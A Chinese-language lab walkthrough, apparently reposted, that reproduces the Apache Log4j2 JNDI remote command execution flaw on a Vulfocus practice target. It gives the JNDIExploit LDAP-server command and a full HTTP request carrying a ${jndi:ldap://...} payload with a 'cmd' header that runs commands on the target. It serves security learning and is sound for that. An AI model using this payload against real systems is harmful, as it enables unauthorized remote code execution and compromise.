【Vulfocus解題系列】手把手教你使用Vulfocus公開靶場對Apache Log4j2遠程命令執行漏洞復現


前言

關於這個漏洞,啥都不用說了,直接發車。

工具下載

JNDIExploit:https://github.com/0x727/JNDIExploit

復現過程

  1. 啟動靶場環境

    直接用vulfocus啟一個環境。
    官網地址:http://vulfocus.fofa.so/

​ 沒注冊的先注冊,進來首頁即可看到靶場

image-20211212143803332

  1. 用JNDIExploit啟一個ldap的服務。

  2. 命令如下:

    java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0

    image-20211212145457761

  3. 接着將payload更改如下:
    payload=$

    注意Content-Type的類型為:application/x-www-form-urlencoded
    在請求頭中添加cmd字段,后面跟上需要執行的命令即可。

    完整數據包如下:

    POST /hello  HTTP/1.1
    Host: vulfocus.fofa.so:41624
    Content-Type: application/x-www-form-urlencoded
    cmd: whoami
    Content-Length: 47
    
    payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
    

    成功回顯命令:

    image-20211212145553316

后記

本文章僅為學習交流,請勿利用從事非法滲透測試,否則后果自負,與本人無關。
本漏洞推薦使用公開靶場或自己搭建環境進行復現和研究,但切忌進行未授權測試。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM